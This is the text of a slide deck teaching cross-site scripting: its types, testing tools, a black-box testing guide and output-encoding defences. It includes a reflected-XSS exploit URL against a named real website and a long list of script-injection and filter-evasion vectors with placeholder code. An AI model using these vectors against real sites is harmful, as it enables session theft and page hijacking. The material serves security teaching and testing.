This presentation explores on how to test Cross site scripting Injection Vulnerabilities, prevention, Best practice, small lab(introduction to web goat) etc.

1. XSS
Cross site scripting

2. Pankaj Dey,
Mindfire

3. Who knows XSS?

4. What is cross site scripting
XSS is a vulnerability that allows an attacker to run arbitrary
JavaScript in the context of the vulnerable website

5. Traditional XSS

6. Is XSS Dangerous?
Big Yes.(OWASP Top 2)Just think, any JavaScript
you want will be run in the victim’s browser in the context
of the vulnerable web page
what can you do with JavaScript?

7. what can you do with JavaScript?
Pop-up alerts and prompts
1.
Access/Modify DOM
2.
Access cookies/session tokens
3.
“Circumvent” same-origin policy
Virtually deface web page
Detect installed programs
Detect browser history
Capture keystrokes (and other trojan functionality)
Port scan the local network
Induce user actions…………………So on..

8. Types of XSS
•
•
•
Reflected XSS
Stored XSS (a.k.a. “Persistent XSS”)
DOM Based XSS

9. Reflected XSS
Exploit URL:
http://www.nikebiz.com/search/?q=<script>alert('XSS')
</script>&x=0&y=0
HTML returned to victim:
<div id="pageTitleTxt"> <h2><span
class="highlight">Search Results</span><br />
Search: "<script>alert('XSS')</script>"</h2>

10. Stored XSS
JavaScript supplied by the attacker is stored by the website (e.g. in a
database)
Doesn’t require the victim to supply the JavaScript somehow, just visit the
exploited web page
More dangerous than Reflected XSS
Has resulted in many XSS worms on high profile sites like MySpace and
Twitter

11. DOM Based XSS
DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS
attack wherein the attack payload is executed as a result of modifying the
DOM “environment” in the victim’s browser used by the original client side
script, so that the client side code runs in an “unexpected” manner
https://www.owasp.org/index.php/DOM_Based_XSS

12. Webgoat

13. Tools we need..
XSS-Proxy - http://xss-proxy.sourceforge.net/
ratproxy - http://code.google.com/p/ratproxy/
Burp Proxy - http://portswigger.net/proxy/
OWASP Zed Attack Proxy (ZAP) - OWASP_Zed_Attack_Proxy_Project
HackVertor - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
PHP Charset Encoder(PCE) - http://h4k.in/encoding [mirror: http://yehg.net/e ]
https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework
DOM Based XSS tools

14. Limitations
Often fail to test a substantial fraction of a web
application’s logic ..
Especially when this logic is invoked from pages that can
only be reached after filling out complex forms that check
the correctness of the provided values.

15. Testing guide
Black Box testing
1.
Detect input vectors.
2.
Analyze each input vector to detect potential vulnerabilities.
XSS Filter
Evasion Cheat Sheet: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
3.
For each test input attempted in the previous phase, the tester will
analyze the result and determine if it represents a vulnerability that has a
realistic impact on the web application's security.
Gray Box testing
Gray Box testing is similar to Black box testing with partial knowledge of the
application.
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)

16. Script. Where it can be executed..!!
<a href="javas&#99;ript&#35;[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
[IE] <img dynsrc="javascript:[code]">
[IE] <input type="image" dynsrc="javascript:[code]">
[IE] <bgsound src="javascript:[code]">
&<script>[code]</script>
[N4] &{[code]};
[N4] <img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
[IE] <iframe src="vbscript:[code]">
[N4] <img src="mocha:[code]">
[N4]<img src="livescript:[code]">
<a href="about:<s&#99;ript>[code]</script>">
<meta http-equiv="refresh"
content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image:
url(javascript:[code]);">
[IE] <div style="behaviour: url([link to code]);">
[Mozilla] <div style="binding: url([link to code]);">
[IE] <div style="width: expression([code]);">
[N4] <style type="text/javascript">[code]</style>
[IE] <object classid="clsid:..."
codebase="javascript:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml d="X"><a><b>&lt;script>[code]&lt;/script>;
</b></a> </xml>
<div datafld="b" dataformatas="html"
datasrc="#X"></div>
[UTF-8; IE, Opera]
[xC0][xBC]script>[code][xC0][xBC]/script>

17. Developer Guide
Validate Output
Encode HTML Output
If data came from user input, a database, or a file
Response.Write(HttpUtility.HtmlEncode(Request.Form["name"]));
Not 100% effective but prevents most vulnerabilities
Encode URL Output
If returning URL strings
Response.Write(HttpUtility.UrlEncode(urlString));
How To: Prevent Cross-Site Scripting in ASP.NET
http://msdn.microsoft.com/en-us/library/ms998274.aspx
XSS Prevention Cheat Sheet:
http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_
Cheat_Sheet

18. How to safely render untrusted data

19. Conclusion
XSS vulnerabilities are bad.
Don’t satisfy with black box scanner.. Hacker
don’t.
Avoid introducing XSS vulnerabilities in your
code.
Beware while clicking on a phishing link..